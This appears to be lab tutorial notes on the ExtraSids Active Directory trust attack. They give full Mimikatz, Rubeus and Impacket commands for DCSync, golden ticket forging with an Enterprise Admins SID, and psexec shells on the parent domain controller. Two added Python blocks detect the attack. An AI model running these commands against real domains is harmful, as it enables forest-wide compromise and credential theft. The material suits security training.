Child->Parent Trust
Windows
ExtraSids Attack - Mimikatz
This attack allows for the compromise of a parent domain once the child domain has been compromised. Within the same AD forest, the sidHistory property is respected due to a lack of SID Filtering protection on trusts within the forest. SID Filtering is a protection put in place to filter out authentication requests from a domain in another forest across a trust. Therefore, if a user in a child domain has their sidHistory set to the Enterprise Admins group (which only exists in the parent domain), they are treated as a member of this group, which allows for administrative access to the entire forest. In other words, we are creating a Golden Ticket from the compromised child domain to compromise the parent domain. In this case, we will leverage SIDHistory to grant an account (even a non-existent one) Enterprise Admin rights by setting this attribute to the SID of the Enterprise Admins group, which gives us full access to the parent domain without actually being a member of the group.
Here's what we first need:
The KRBTGT hash for the child domain
The SID for the child domain
The name of a target user in the child domain (does not need to exist!)
The FQDN of the child domain
The SID of the Enterprise Admins group of the root domain
With this data collected, the attack can be performed with Mimikatz.
Note: here we assume that the child domain FQDN is LOGISTICS.INLANEFREIGHT.LOCAL and the parent domain FQDN is INLANEFREIGHT.LOCAL.
Now we can gather each piece of data required to perform the ExtraSids attack. First, we need to obtain the NT hash for the KRBTGT account, which is a service account for the Key Distribution Center (KDC) in Active Directory. The KRBTGT (Kerberos Ticket Granting Ticket) account's key is used to encrypt/sign all Kerberos tickets granted within a given domain. Domain controllers use the account's password to decrypt and validate Kerberos tickets. The KRBTGT account can be used to create Kerberos TGT tickets that can be used to request TGS tickets for any service on any host in the domain. This is also known as the Golden Ticket attack and is a well-known persistence mechanism for attackers in Active Directory environments. The only way to invalidate a Golden Ticket is to change the password of the KRBTGT account.
Here, we assume we have already compromised the child domain, so we can log in as a Domain Admin or similar and perform the DCSync attack to obtain the NT hash for the KRBTGT account.
We can obtain the KRBTGT account's NT Hash using Mimikatz:
mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt
Next we get the domain SID:
Get-DomainSID
Next we need to get the SID for the Enterprise Admins group in the parent domain. We can use Get-DomainGroup from PowerView. We could also do this with the Get-ADGroup cmdlet, with a command such as Get-ADGroup -Identity "Enterprise Admins" -Server "INLANEFREIGHT.LOCAL".
Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid
Assuming this is what we have so far:
The KRBTGT hash for the child domain:
9d765b482771505cbe97411065964d5f
The SID for the child domain:
S-1-5-21-2806153819-209893948-922872689
The name of a target user in the child domain (does not need to exist to create our Golden Ticket!). We'll choose a fake user:
hacker
The FQDN of the child domain:
LOGISTICS.INLANEFREIGHT.LOCAL
The SID of the Enterprise Admins group of the root domain:
S-1-5-21-3842939050-3880317879-2865463114-519
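The following is an added example (it is not part of the original page or of any tool the page mentions) showing, in Python, how the SIDs collected above fit together and how a defender can spot their misuse: the Enterprise Admins SID is the parent domain SID with RID 519 appended, and once a ticket carrying that SID as an extra SID is used, the account's logon token lists it as a group membership even though the account itself belongs to the child domain. The SIDs are the lab values from this page; the logon records are constructed sample data, and their shape is an assumption, loosely modeled on the group list that a Windows "Group membership information" logon event (ID 4627) reports.

```python
"""Added example: parse Windows SIDs and flag logons where an account from one
domain carries a privileged group SID (e.g. Enterprise Admins, RID 519) that
belongs to a different domain, which is what the ExtraSids technique produces."""
import re
from dataclasses import dataclass

# Well-known privileged RIDs that are relative to a domain SID.
PRIVILEGED_RIDS = {
    500: "Administrator",
    512: "Domain Admins",
    516: "Domain Controllers",
    518: "Schema Admins",
    519: "Enterprise Admins",
}

SID_RE = re.compile(r"^S-1-(\d+)((?:-\d+)+)$")


@dataclass(frozen=True)
class Sid:
    authority: int
    subauthorities: tuple

    @classmethod
    def parse(cls, text):
        m = SID_RE.match(text.strip())
        if not m:
            raise ValueError("not a SID: %r" % text)
        subs = tuple(int(x) for x in m.group(2).lstrip("-").split("-"))
        return cls(int(m.group(1)), subs)

    @property
    def rid(self):
        return self.subauthorities[-1]

    @property
    def domain(self):
        # The domain SID is everything before the final sub-authority (the RID).
        return Sid(self.authority, self.subauthorities[:-1])

    def is_domain_relative(self):
        # Only S-1-5-21-... SIDs belong to a domain; S-1-5-11 (Authenticated
        # Users) and similar are global and have no domain part.
        return self.authority == 5 and self.subauthorities[:1] == (21,)

    def __str__(self):
        return "S-1-%d-%s" % (self.authority, "-".join(map(str, self.subauthorities)))


def enterprise_admins_sid(parent_domain_sid):
    """Domain SID + RID 519: the same composition as the lookupsid/grep step."""
    d = Sid.parse(parent_domain_sid)
    return str(Sid(d.authority, d.subauthorities + (519,)))


def foreign_privileged_sids(account_sid, group_sids):
    """Privileged group SIDs whose domain differs from the account's own domain.
    A child-domain account should never carry the parent's Enterprise Admins SID."""
    home = Sid.parse(account_sid).domain
    hits = []
    for g in group_sids:
        s = Sid.parse(g)
        if s.is_domain_relative() and s.rid in PRIVILEGED_RIDS and s.domain != home:
            hits.append((str(s), PRIVILEGED_RIDS[s.rid]))
    return hits


# Domain SIDs taken from the lab values on this page.
CHILD_DOMAIN_SID = "S-1-5-21-2806153819-209893948-922872689"
PARENT_DOMAIN_SID = "S-1-5-21-3842939050-3880317879-2865463114"

# Constructed sample logon records (assumed shape; RIDs are illustrative).
SAMPLE_LOGONS = [
    {   # ordinary child-domain user: only child-domain and global groups
        "account": "LOGISTICS\\alice",
        "account_sid": CHILD_DOMAIN_SID + "-1104",
        "groups": [CHILD_DOMAIN_SID + "-513", "S-1-5-11"],
    },
    {   # forged ticket with an extra SID: child account carrying parent EA SID
        "account": "LOGISTICS\\hacker",
        "account_sid": CHILD_DOMAIN_SID + "-500",
        "groups": [CHILD_DOMAIN_SID + "-513", CHILD_DOMAIN_SID + "-512",
                   PARENT_DOMAIN_SID + "-519", "S-1-5-11"],
    },
]


def flag_logons(records):
    """Return (account, [(sid, group name), ...]) for each suspicious logon."""
    alerts = []
    for r in records:
        hits = foreign_privileged_sids(r["account_sid"], r["groups"])
        if hits:
            alerts.append((r["account"], hits))
    return alerts


if __name__ == "__main__":
    print("Enterprise Admins SID:", enterprise_admins_sid(PARENT_DOMAIN_SID))
    for account, hits in flag_logons(SAMPLE_LOGONS):
        print("ALERT", account, "holds foreign privileged SIDs:", hits)
```

The check deliberately compares domains rather than just looking for RID 519: accounts in the parent domain legitimately hold Enterprise Admins, so only a cross-domain pairing is a signal. A second, independent signal on the same logon is that the account name (here "hacker", which the page notes does not need to exist) cannot be found in the child domain's directory.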
Now that we have everything we need, using Mimikatz and the data listed above, we can create a Golden Ticket to access all resources within the parent domain.
mimikatz.exe
kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt
After that, we confirm that the Kerberos ticket for the non-existent hacker user is residing in memory using the klist command.
Now, if we run this command to access the parent domain's file system, which we could not do before, we have access:
ls \\academy-ea-dc01.inlanefreight.local\c$
ExtraSids Attack - Rubeus
Again, if we run this first, it will show access denied:
ls \\academy-ea-dc01.inlanefreight.local\c$
Now, using the same data but with Rubeus, we can try this attack:
.\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt
Final - DCSync Parent Domain
Finally, we can test this access by performing a DCSync attack against the parent domain, targeting the lab_adm Domain Admin user.
.\mimikatz.exe
lsadump::dcsync /user:INLANEFREIGHT\lab_adm
When dealing with multiple domains, and our target domain is not the same as the user's domain, we need to specify the exact domain so that the DCSync operation is performed against that domain's domain controller. The command for this would look like the following:
lsadump::dcsync /user:INLANEFREIGHT\lab_adm /domain:INLANEFREIGHT.LOCAL
Linux
Again, we assume we have compromised the child domain and have admin-level access.
Impacket
Performing DCSync with secretsdump.py:
secretsdump.py logistics.inlanefreight.local/[email protected] -just-dc-user LOGISTICS/krbtgt
Next, we can use lookupsid.py from the Impacket toolkit to perform SID brute forcing to find the SID of the child domain. In this command, whatever we specify for the IP address (the IP of the domain controller in the child domain) will become the target domain for the SID lookup.
lookupsid.py logistics.inlanefreight.local/[email protected]
Next, we get the SID of the "Enterprise Admins" group:
lookupsid.py logistics.inlanefreight.local/[email protected] | grep -B12 "Enterprise Admins"
We then combine this with the domain SID to get the group's full SID. Now we have all the data we need to perform our attack. To do that, we can use ticketer.py from the Impacket toolkit to construct a Golden Ticket. This ticket will be valid to access resources in the child domain (specified by -domain-sid) and the parent domain (specified by -extra-sid).
ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker
The ticket will be saved to our system as a credential cache (ccache) file, which is a file used to hold Kerberos credentials. Setting the KRB5CCNAME environment variable tells the system to use this file for Kerberos authentication attempts.
export KRB5CCNAME=hacker.ccache
We can check whether we can successfully authenticate to the parent domain's Domain Controller using Impacket's version of Psexec. If successful, we will be dropped into a SYSTEM shell on the target Domain Controller.
psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/[email protected] -k -no-pass -target-ip 172.16.5.5
Psexec can also be used to connect as any user if we know the username and password. For example, for a user that is a Domain Admin, we can log into the DC with a shell:
psexec.py sapsso:[email protected]
Autopwn raiseChild.py
Impacket also has the tool raiseChild.py, which will automate escalating from child to parent domain. We need to specify the target domain controller and credentials for an administrative user in the child domain; the script will do the rest. If we walk through the output, we see that it starts by listing out the child and parent domain's fully qualified domain names (FQDN). It then:
Obtains the SID for the Enterprise Admins group of the parent domain
Retrieves the hash for the KRBTGT account in the child domain
Creates a Golden Ticket
Logs into the parent domain
Retrieves credentials for the Administrator account in the parent domain
Finally, if the -target-exec switch is specified, it authenticates to the parent domain's Domain Controller via Psexec.
raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm
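Every path on this page ends in a DCSync (lsadump::dcsync in the Windows section, secretsdump.py in the Linux section, and the KRBTGT and Administrator credential retrieval inside raiseChild.py). This added Python example, which is not from the original page or from Impacket, shows the detection logic a defender would run for that step: a DCSync asks a domain controller for directory replication, which Windows audits as Event ID 4662 with the replication control-access rights listed in the Properties field, and only domain controllers should ever exercise those rights. The log lines below are constructed sample data in a simplified single-line key=value layout (an assumption; real 4662 events are multi-line), and the DC allowlist is derived from the DC host name that appears on this page.

```python
"""Added example: flag Event ID 4662 records that exercise AD replication
rights from an account that is not a known domain controller (DCSync detection)."""
import re

# Control-access right GUIDs that DCSync needs (well-known AD extended rights).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Computer accounts that legitimately replicate; constructed from the DC name
# on this page (academy-ea-dc01.inlanefreight.local).
KNOWN_DC_ACCOUNTS = {"INLANEFREIGHT\\ACADEMY-EA-DC01$"}

GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")
FIELD_RE = re.compile(r"(\w+)=(\S+)")

# Constructed sample log lines (assumed key=value layout). The last GUID is a
# made-up non-replication property to show that ordinary 4662s are ignored.
SAMPLE_4662_LOG = """\
EventID=4662 SubjectAccount=INLANEFREIGHT\\ACADEMY-EA-DC01$ ObjectName=DC=INLANEFREIGHT,DC=LOCAL Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2};{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
EventID=4662 SubjectAccount=LOGISTICS\\hacker ObjectName=DC=INLANEFREIGHT,DC=LOCAL Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2};{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
EventID=4662 SubjectAccount=INLANEFREIGHT\\lab_adm ObjectName=CN=lab_adm,CN=Users,DC=INLANEFREIGHT,DC=LOCAL Properties={11111111-2222-3333-4444-555555555555}
EventID=4624 SubjectAccount=LOGISTICS\\hacker ObjectName=- Properties=-
"""


def parse_fields(line):
    """Turn one key=value line into a dict (values run up to the next space)."""
    return dict(FIELD_RE.findall(line))


def replication_rights_in(properties):
    """Names of the replication rights present in a 4662 Properties value."""
    return [REPLICATION_RIGHTS[g.lower()]
            for g in GUID_RE.findall(properties)
            if g.lower() in REPLICATION_RIGHTS]


def dcsync_alerts(log_text, known_dcs=KNOWN_DC_ACCOUNTS):
    """Return (account, object, [right names]) for every 4662 that uses a
    replication right from an account that is not an allowlisted DC."""
    allow = {d.upper() for d in known_dcs}
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        f = parse_fields(line)
        if f.get("EventID") != "4662":
            continue
        rights = replication_rights_in(f.get("Properties", ""))
        if not rights:
            continue  # some other directory operation, not replication
        account = f.get("SubjectAccount", "?")
        if account.upper() in allow:
            continue  # expected DC-to-DC replication traffic
        alerts.append((account, f.get("ObjectName", "?"), rights))
    return alerts


if __name__ == "__main__":
    for account, obj, rights in dcsync_alerts(SAMPLE_4662_LOG):
        print("ALERT possible DCSync by", account, "against", obj, "using", rights)
```

Because the forged ticket on this page authenticates as a child-domain principal, the alert here shows a LOGISTICS account replicating the INLANEFREIGHT naming context, which is exactly the cross-domain pattern the Final - DCSync Parent Domain step produces. The allowlist must cover every DC and any Azure AD Connect style sync account, otherwise legitimate replication shows up as noise.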